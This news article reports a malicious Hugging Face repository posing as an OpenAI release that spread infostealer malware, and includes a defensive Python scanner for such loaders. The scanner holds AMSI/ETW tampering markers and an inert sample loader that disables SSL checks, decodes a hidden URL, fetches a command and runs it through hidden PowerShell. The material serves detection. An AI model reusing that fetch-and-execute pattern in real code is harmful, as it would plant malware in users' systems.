Malicious Hugging Face Repository Masquerading As OpenAI Release Hits 244K Downloads

Trending Hugging Face Repository Exposed As Open Source Malware Trap

A fake OpenAI AI model repository on Hugging Face delivered infostealer malware to Windows systems and briefly became the platform’s top trending project, exposing growing risks in open-source AI supply chains.

A malicious repository on Hugging Face masquerading as an OpenAI release delivered infostealer malware to Windows systems and amassed 244,000 downloads before removal, highlighting growing software supply-chain risks within open-source AI ecosystems.

The fake repository, Open-OSS/privacy-filter, impersonated OpenAI’s legitimate Privacy Filter release and copied its model card almost word-for-word to appear authentic. The repository reportedly climbed to the #1 trending position on Hugging Face within 18 hours, underscoring how public AI repositories are becoming attractive malware distribution channels.

According to AI security firm HiddenLayer, the repository contained a malicious loader.py script that posed as routine model setup code before triggering a concealed infection chain. On execution the loader disabled SSL certificate verification, decoded a base64-encoded URL pointing to jsonkeeper.com, fetched payload instructions from that address, and handed the resulting commands to PowerShell, while attempting to disable the Windows AMSI and ETW defenses that would otherwise inspect or log that activity.
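The chain described above leaves static fingerprints in the loader's source: an assignment that swaps in an unverified SSL context, a base64 literal that decodes to a URL, and a subprocess call whose first argument is a PowerShell binary. The triage script below is an added example written for this article, not HiddenLayer's tooling or anything from the repository in question. It parses a candidate loader with Python's ast module, reports those indicators plus a few well-known AMSI/ETW tampering strings, and renders a verdict. The two sample loaders are constructed test inputs: the "suspicious" one only mirrors the pattern in the text, is parsed but never executed, and points at the reserved example.invalid domain.

```python
"""Static triage of a Hugging Face 'loader' script for the indicators described above:
SSL verification switched off, a base64-wrapped URL, a hand-off to PowerShell, and
AMSI/ETW tampering strings. Heuristic review aid, not proof of maliciousness."""
import ast
import base64
import binascii
import re

URL_RE = re.compile(rb"^https?://[\x21-\x7e]+$")          # printable-ASCII URL
SHELL_PREFIXES = ("powershell", "pwsh", "cmd.exe")
EXEC_FUNCS = ("subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen")
AMSI_ETW_MARKERS = ("AmsiScanBuffer", "amsiInitFailed", "AmsiUtils", "EtwEventWrite")


def _dotted(node):
    """Render a Name/Attribute chain such as ssl._create_unverified_context."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _decoded_url(literal):
    """Return the URL hidden in a base64 literal, or None if it is not one."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("ascii") if URL_RE.match(raw) else None


def _strings_in(node):
    for n in ast.walk(node):
        if isinstance(n, ast.Constant) and isinstance(n.value, str):
            yield n.value


def scan_loader_source(src):
    """Return (indicator, detail) pairs found in the script's source text."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Assign):
            # Replacing the default HTTPS context disables certificate checks for
            # every urllib request made by the process.
            if any(_dotted(t) == "ssl._create_default_https_context" for t in node.targets):
                findings.append(("ssl_verify_disabled", _dotted(node.value) or "<expr>"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name == "ssl._create_unverified_context":
                findings.append(("ssl_verify_disabled", name))
            elif name in ("base64.b64decode", "b64decode"):
                for arg in node.args:
                    if isinstance(arg, ast.Constant) and isinstance(arg.value, (str, bytes)):
                        url = _decoded_url(arg.value)
                        if url:
                            findings.append(("base64_url", url))
            elif name in EXEC_FUNCS:
                for s in _strings_in(node):
                    if s.lower().startswith(SHELL_PREFIXES):
                        findings.append(("shell_handoff", f"{name}({s!r}, ...)"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for marker in AMSI_ETW_MARKERS:
                if marker in node.value:
                    findings.append(("amsi_etw_marker", marker))
    return findings


def verdict(findings):
    """Two or more distinct indicator classes together warrant holding the download
    for review; a lone indicator is noisy (developers do disable SSL in test code)."""
    return "suspicious" if len({kind for kind, _ in findings}) >= 2 else "clean"


# Constructed test inputs (hypothetical, not the real loader.py). The second one is
# inert: it is only parsed here, never executed, and example.invalid never resolves.
BENIGN_LOADER = '''
import json, os
from transformers import AutoModel

def load(path):
    with open(os.path.join(path, "config.json")) as f:
        cfg = json.load(f)
    return AutoModel.from_pretrained(path), cfg
'''

_STAGE_URL = "https://example.invalid/stage.json"
SUSPICIOUS_LOADER = f'''
import ssl, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
stage = base64.b64decode("{base64.b64encode(_STAGE_URL.encode()).decode()}").decode()
cmd = urllib.request.urlopen(stage).read().decode()
marker = "AmsiScanBuffer"
subprocess.run(["powershell", "-nop", "-w", "hidden", "-c", cmd], check=False)
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_LOADER), ("suspicious", SUSPICIOUS_LOADER)):
        hits = scan_loader_source(src)
        print(label, verdict(hits), hits)
```

Run against a checked-out repository it flags any .py file whose findings span two or more indicator classes; the decoded URL in the base64_url finding is the piece worth pivoting on, since the text notes the attacker can rotate what that address serves without touching the repository, so the hosting domain rather than the payload is the durable indicator.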

“Using jsonkeeper[.]com as the C2 channel lets the attacker rotate the payload without modifying the repository,” HiddenLayer researchers noted.

HiddenLayer also identified six additional Hugging Face repositories using similar malicious loader logic and linked the campaign to earlier npm typosquatting attacks and fake AI packages on PyPI.

“Traditional SCA was designed to inspect dependency manifests, libraries, and container images, not the increasingly complex behaviors associated with AI development workflows,” said Sakshi Grover, Senior Research Manager for Cybersecurity Services at IDC.
